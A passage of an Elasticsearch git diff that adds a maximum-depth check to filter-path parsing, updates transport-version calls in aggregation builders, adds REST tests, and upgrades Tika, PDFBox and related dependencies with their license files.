assertTextRef(parser.getValueAsText().bytes(), currVal); + var text = parser.getValueAsText(); + assertTextRef(text.bytes(), currVal); + assertThat(text.stringLength(), Matchers.equalTo(currVal.length())); } else { assertThat(parser.getValueAsText(), Matchers.nullValue()); assertThat(parser.getValueAsString(), Matchers.equalTo(currVal)); diff --git a/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java b/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java index 0b9aa17ae3e78..a12ab4e6a85c0 100644 --- a/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java +++ b/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java @@ -22,6 +22,9 @@ public class FilterPath { private static final String WILDCARD = "*"; private static final String DOUBLE_WILDCARD = "**"; + // This is ridiculously large, but we can be 100% certain that if any filter tries to exceed this depth then it is a mistake + static final int MAX_TREE_DEPTH = 500; + private final Map termsChildren; private final FilterPath[] wildcardChildren; private final String pattern; @@ -132,6 +135,7 @@ private boolean matchFieldNamesWithDots(String name, int dotIndex, List children; private final boolean isFinalNode; @@ -145,14 +149,19 @@ private static class BuildNode { private final BuildNode root = new BuildNode(false); void insert(String filter) { - insertNode(filter, root); + insertNode(filter, root, 0); } FilterPath build() { return buildPath("", root); } - static void insertNode(String filter, BuildNode node) { + static void insertNode(String filter, BuildNode node, int depth) { + if (depth > MAX_TREE_DEPTH) { + throw new IllegalArgumentException( + "Filter exceeds maximum depth at [" + (filter.length() > 100 ? filter.substring(0, 100) : filter) + "]" + ); + } int end = filter.length(); int splitPosition = -1; boolean findEscapes = false; @@ -171,7 +180,7 @@ static void insertNode(String filter, BuildNode node) { String field = findEscapes ? filter.substring(0, splitPosition).replace("\\.", ".") : filter.substring(0, splitPosition); BuildNode child = node.children.computeIfAbsent(field, f -> new BuildNode(false)); if (false == child.isFinalNode) { - insertNode(filter.substring(splitPosition + 1), child); + insertNode(filter.substring(splitPosition + 1), child, depth + 1); } } else { String field = findEscapes ? filter.replace("\\.", ".") : filter; diff --git a/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java b/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java index abe2a78112fd7..5de8b5c1029e6 100644 --- a/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java +++ b/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java @@ -21,6 +21,7 @@ import static java.util.Collections.singleton; import static org.hamcrest.Matchers.arrayWithSize; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.is; public class FilterPathTests extends ESTestCase { @@ -403,4 +404,16 @@ public void testDotInFieldName() { assertTrue(filterPaths[0].matches("a.b.c.d", nextFilters, true)); assertEquals(nextFilters.size(), 0); } + + public void testDepthChecking() { + final String atLimit = "x" + (".x").repeat(FilterPath.MAX_TREE_DEPTH); + final String aboveLimit = atLimit + ".y"; + + var paths = FilterPath.compile(Set.of(atLimit)); + assertThat(paths, arrayWithSize(1)); + + var ex = expectThrows(IllegalArgumentException.class, () -> FilterPath.compile(Set.of(aboveLimit))); + assertThat(ex.getMessage(), containsString("maximum depth")); + assertThat(ex.getMessage(), containsString("[y]")); + } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java index a53671e4ca668..d4ac360614c71 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.IndexSearcher; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.aggregations.bucket.adjacency.AdjacencyMatrixAggregator.KeyedFilter; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -256,6 +255,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java index 516aed6e61b0a..56eb53a7230f4 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -255,7 +254,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static class RoundingInfo implements Writeable { diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java index 37ad08ef2c757..d9ad47b85d83d 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java @@ -101,6 +101,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java index f2eff8bf8a896..8fc371ceef1be 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -217,6 +216,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java index 8a4eaa41d4b8e..d78dc3e55b12a 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java @@ -9,7 +9,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.AbstractPipelineAggregationBuilder; @@ -196,6 +195,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java index 637efb9d91df7..21b7f3ddbee31 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; @@ -259,6 +258,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java index 551559f80b46e..9ae4572ca6c30 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -223,6 +222,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml b/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml index c23c2a7ee52a4..bd093955a910f 100644 --- a/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml +++ b/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml @@ -340,3 +340,31 @@ top level fails: buckets_path: b: b script: params.b + 12 + +--- +invalid parent aggregation: + - requires: + capabilities: + - method: POST + path: /_search + capabilities: [ bucket_script_parent_multi_bucket_error ] + test_runner_features: [capabilities] + reason: "changed error 500 to 400" + - do: + catch: /Expected a multi bucket aggregation but got \[InternalFilter\] for aggregation \[d\]/ + search: + body: + aggs: + a: + filter: + term: + a: 1 + aggs: + b: + sum: + field: b + d: + bucket_script: + buckets_path: + b: b + script: params.b + 12 diff --git a/modules/data-streams/build.gradle b/modules/data-streams/build.gradle index fcd435e29a30d..a4dc90ed54e21 100644 --- a/modules/data-streams/build.gradle +++ b/modules/data-streams/build.gradle @@ -83,7 +83,7 @@ tasks.named("yamlRestCompatTestTransform").configure({ task -> }) configurations { - basicRestSpecs { + restTests { attributes { attribute(ArtifactTypeDefinition.ARTIFACT_TYPE_ATTRIBUTE, ArtifactTypeDefinition.DIRECTORY_TYPE) } @@ -91,5 +91,5 @@ configurations { } artifacts { - basicRestSpecs(new File(projectDir, "src/yamlRestTest/resources/rest-api-spec/test")) + restTests(new File(projectDir, "src/yamlRestTest/resources/rest-api-spec/test")) } diff --git a/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml b/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml index ad09a06378c5e..12d038de77818 100644 --- a/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml +++ b/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml @@ -327,8 +327,6 @@ setup: index: "my-data-stream-1" wait_for_status: green - - - do: indices.get_data_stream: name: my-data-stream-1 @@ -398,3 +396,96 @@ setup: - match: { .$idx0name.settings.index.number_of_shards: "1" } - match: { .$idx0name.settings.index.lifecycle.name: "my-policy" } - match: { .$idx0name.settings.index.lifecycle.prefer_ilm: "true" } + +--- +"Test null out settings component templates only": + - requires: + cluster_features: [ "logs_stream" ] + reason: requires setting 'logs_stream' to get or set data stream settings + + - do: + cluster.put_component_template: + name: settings-template + body: + template: + settings: + lifecycle.name: my-policy + + - do: + allowed_warnings: + - "index template [my-component-only-template] has index patterns [my-component-only-data-stream-*] matching patterns from existing older templates [global] with patterns (global => [*]); this template [my-component-only-template] will take precedence during new index creation" + indices.put_index_template: + name: my-component-only-template + body: + index_patterns: [ my-component-only-data-stream-* ] + data_stream: { } + composed_of: + - settings-template + + - do: + indices.create_data_stream: + name: my-component-only-data-stream-1 + + - do: + cluster.health: + index: "my-component-only-data-stream-1" + wait_for_status: green + + - do: + indices.get_data_stream: + name: my-component-only-data-stream-1 + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.settings: {} } + - match: { data_streams.0.effective_settings: null } + + - do: + indices.put_data_stream_settings: + name: my-component-only-data-stream-1 + body: + index: + lifecycle: + name: my-new-policy + prefer_ilm: true + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.applied_to_data_stream: true } + - length: { data_streams.0.index_settings_results.applied_to_data_stream_and_backing_indices: 2 } + - match: { data_streams.0.settings.index.lifecycle.name: "my-new-policy" } + - match: { data_streams.0.settings.index.lifecycle.prefer_ilm: "true" } + - match: { data_streams.0.effective_settings.index.lifecycle.name: "my-new-policy" } + - match: { data_streams.0.effective_settings.index.lifecycle.prefer_ilm: "true" } + + - do: + indices.put_data_stream_settings: + name: my-component-only-data-stream-1 + body: + index: + lifecycle: + name: null + prefer_ilm: null + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.applied_to_data_stream: true } + - length: { data_streams.0.index_settings_results.applied_to_data_stream_and_backing_indices: 2 } + - match: { data_streams.0.settings.index.lifecycle.name: null } + - match: { data_streams.0.settings.index.lifecycle.prefer_ilm: null } + - match: { data_streams.0.effective_settings.index.lifecycle.name: "my-policy" } + - match: { data_streams.0.effective_settings.index.lifecycle.prefer_ilm: null } + + - do: + indices.get_data_stream_settings: + name: my-component-only-data-stream-1 + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.settings.index.lifecycle.name: null } + - match: { data_streams.0.settings.index.lifecycle.prefer_ilm: null } + - match: { data_streams.0.effective_settings.index.lifecycle.name: "my-policy" } + - match: { data_streams.0.effective_settings.index.lifecycle.prefer_ilm: null } + + - do: + indices.get_data_stream: + name: my-component-only-data-stream-1 + - set: { data_streams.0.indices.0.index_name: idx0name } + + - do: + indices.get_settings: + index: my-component-only-data-stream-1 + - match: { .$idx0name.settings.index.lifecycle.name: "my-policy" } + - match: { .$idx0name.settings.index.lifecycle.prefer_ilm: null } diff --git a/modules/ingest-attachment/build.gradle b/modules/ingest-attachment/build.gradle index 993c02993c571..7a8198cda930f 100644 --- a/modules/ingest-attachment/build.gradle +++ b/modules/ingest-attachment/build.gradle @@ -19,24 +19,24 @@ esplugin { // when updating tika, please review it's parent pom : https://repo1.maven.org/maven2/org/apache/tika/tika-parent // and manually update the transitive dependencies here def versions = [ - 'tika' : '2.9.3', - 'pdfbox': '2.0.33', - 'poi' : '5.4.0', + 'tika' : '3.2.2', + 'pdfbox': '3.0.5', + 'poi' : '5.4.1', 'sparsebitset' : '1.3', //poi dependency: https://repo1.maven.org/maven2/org/apache/poi/poi/ - 'mime4j': '0.8.12', - 'commonsCodec': '1.18.0', - 'slf4' : '2.0.16', + 'mime4j': '0.8.13', + 'commonsCodec': '1.19.0', + 'slf4' : '2.0.17', 'xz' : '1.10', - 'commonsIo' : '2.18.0', + 'commonsIo' : '2.20.0', //intentionally using the elder "juniversalchardet:juniversalchardet" rather than the newer "com.github.albfernandez:juniversalchardet" //since the "com.github.albfernandez" fork has some problems with Chinese. 'juniversalchardet' : '1.0.3', - 'tagsoup' : '1.2.1', + 'jsoup' : '1.21.1', 'jempbox' : '1.8.17', 'xmlbeans' : '5.3.0', //poi-ooxml dependency: https://repo1.maven.org/maven2/org/apache/poi/poi-ooxml/ - 'commonsCollections4' : '4.4', - 'commonsCompress' : '1.27.1', - 'commonsLang3' :'3.17.0', + 'commonsCollections4' : '4.5.0', + 'commonsCompress' : '1.28.0', + 'commonsLang3' :'3.18.0', 'commonsMath3' : '3.6.1' ] @@ -86,9 +86,10 @@ dependencies { // external parser libraries // HTML - api "org.ccil.cowan.tagsoup:tagsoup:${versions.tagsoup}" + api "org.jsoup:jsoup:${versions.jsoup}" // Adobe PDF api "org.apache.pdfbox:pdfbox:${versions.pdfbox}" + api "org.apache.pdfbox:pdfbox-io:${versions.pdfbox}" api "org.apache.pdfbox:fontbox:${versions.pdfbox}" api "org.apache.pdfbox:jempbox:${versions.jempbox}" // OpenOffice diff --git a/modules/ingest-attachment/licenses/jsoup-LICENSE.txt b/modules/ingest-attachment/licenses/jsoup-LICENSE.txt new file mode 100644 index 0000000000000..e4bf2be9fb7f2 --- /dev/null +++ b/modules/ingest-attachment/licenses/jsoup-LICENSE.txt @@ -0,0 +1,21 @@ +The MIT License + +Copyright (c) 2009-2025 Jonathan Hedley + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/ingest-attachment/licenses/tagsoup-NOTICE.txt b/modules/ingest-attachment/licenses/jsoup-NOTICE.txt similarity index 100% rename from modules/ingest-attachment/licenses/tagsoup-NOTICE.txt rename to modules/ingest-attachment/licenses/jsoup-NOTICE.txt diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-LICENSE.txt b/modules/ingest-attachment/licenses/pdfbox-io-LICENSE.txt similarity index 60% rename from x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-LICENSE.txt rename to modules/ingest-attachment/licenses/pdfbox-io-LICENSE.txt index d645695673349..97553f24a432a 100644 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-LICENSE.txt +++ b/modules/ingest-attachment/licenses/pdfbox-io-LICENSE.txt @@ -200,3 +200,145 @@ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. + +EXTERNAL COMPONENTS + +Apache PDFBox includes a number of components with separate copyright notices +and license terms. Your use of these components is subject to the terms and +conditions of the following licenses. + +Contributions made to the original PDFBox and FontBox projects: + + Copyright (c) 2002-2007, www.pdfbox.org + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are met: + + 1. Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. Neither the name of pdfbox; nor the names of its contributors may be + used to endorse or promote products derived from this software without + specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE + FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + SUCH DAMAGE. + +Adobe Font Metrics (AFM) for PDF Core 14 Fonts + + This file and the 14 PostScript(R) AFM files it accompanies may be used, + copied, and distributed for any purpose and without charge, with or without + modification, provided that all copyright notices are retained; that the + AFM files are not distributed without this file; that all modifications + to this file or any of the AFM files are prominently noted in the modified + file(s); and that this paragraph is not modified. Adobe Systems has no + responsibility or obligation to support the use of the AFM files. + +CMaps for PDF Fonts (http://opensource.adobe.com/wiki/display/cmap/Downloads) + + Copyright 1990-2009 Adobe Systems Incorporated. + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + + Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + + Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from this + software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF + THE POSSIBILITY OF SUCH DAMAGE. + +PaDaF PDF/A preflight (http://sourceforge.net/projects/padaf) + + Copyright 2010 Atos Worldline SAS + + Licensed by Atos Worldline SAS under one or more + contributor license agreements. See the NOTICE file distributed with + this work for additional information regarding copyright ownership. + Atos Worldline SAS licenses this file to You under the Apache License, Version 2.0 + (the "License"); you may not use this file except in compliance with + the License. You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +OSXAdapter + + Version: 2.0 + + Disclaimer: IMPORTANT: This Apple software is supplied to you by + Apple Inc. ("Apple") in consideration of your agreement to the + following terms, and your use, installation, modification or + redistribution of this Apple software constitutes acceptance of these + terms. If you do not agree with these terms, please do not use, + install, modify or redistribute this Apple software. + + In consideration of your agreement to abide by the following terms, and + subject to these terms, Apple grants you a personal, non-exclusive + license, under Apple's copyrights in this original Apple software (the + "Apple Software"), to use, reproduce, modify and redistribute the Apple + Software, with or without modifications, in source and/or binary forms; + provided that if you redistribute the Apple Software in its entirety and + without modifications, you must retain this notice and the following + text and disclaimers in all such redistributions of the Apple Software. + Neither the name, trademarks, service marks or logos of Apple Inc. + may be used to endorse or promote products derived from the Apple + Software without specific prior written permission from Apple. Except + as expressly stated in this notice, no other rights or licenses, express + or implied, are granted by Apple herein, including but not limited to + any patent rights that may be infringed by your derivative works or by + other works in which the Apple Software may be incorporated. + + The Apple Software is provided by Apple on an "AS IS" basis. APPLE + MAKES NO WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION + THE IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS + FOR A PARTICULAR PURPOSE, REGARDING THE APPLE SOFTWARE OR ITS USE AND + OPERATION ALONE OR IN COMBINATION WITH YOUR PRODUCTS. + + IN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL + OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + INTERRUPTION) ARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, + MODIFICATION AND/OR DISTRIBUTION OF THE APPLE SOFTWARE, HOWEVER CAUSED + AND WHETHER UNDER THEORY OF CONTRACT, TORT (INCLUDING NEGLIGENCE), + STRICT LIABILITY OR OTHERWISE, EVEN IF APPLE HAS BEEN ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. + + Copyright (C) 2003-2007 Apple, Inc., All Rights Reserved diff --git a/modules/ingest-attachment/licenses/pdfbox-io-NOTICE.txt b/modules/ingest-attachment/licenses/pdfbox-io-NOTICE.txt new file mode 100644 index 0000000000000..4da75301eaf79 --- /dev/null +++ b/modules/ingest-attachment/licenses/pdfbox-io-NOTICE.txt @@ -0,0 +1,22 @@ +Apache PDFBox +Copyright 2014 The Apache Software Foundation + +This product includes software developed at +The Apache Software Foundation (http://www.apache.org/). + +Based on source code originally developed in the PDFBox and +FontBox projects. + +Copyright (c) 2002-2007, www.pdfbox.org + +Based on source code originally developed in the PaDaF project. +Copyright (c) 2010 Atos Worldline SAS + +Includes the Adobe Glyph List +Copyright 1997, 1998, 2002, 2007, 2010 Adobe Systems Incorporated. + +Includes the Zapf Dingbats Glyph List +Copyright 2002, 2010 Adobe Systems Incorporated. + +Includes OSXAdapter +Copyright (C) 2003-2007 Apple, Inc., All Rights Reserved diff --git a/modules/ingest-attachment/licenses/tagsoup-LICENSE.txt b/modules/ingest-attachment/licenses/tagsoup-LICENSE.txt deleted file mode 100644 index 261eeb9e9f8b2..0000000000000 --- a/modules/ingest-attachment/licenses/tagsoup-LICENSE.txt +++ /dev/null @@ -1,201 +0,0 @@ - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet 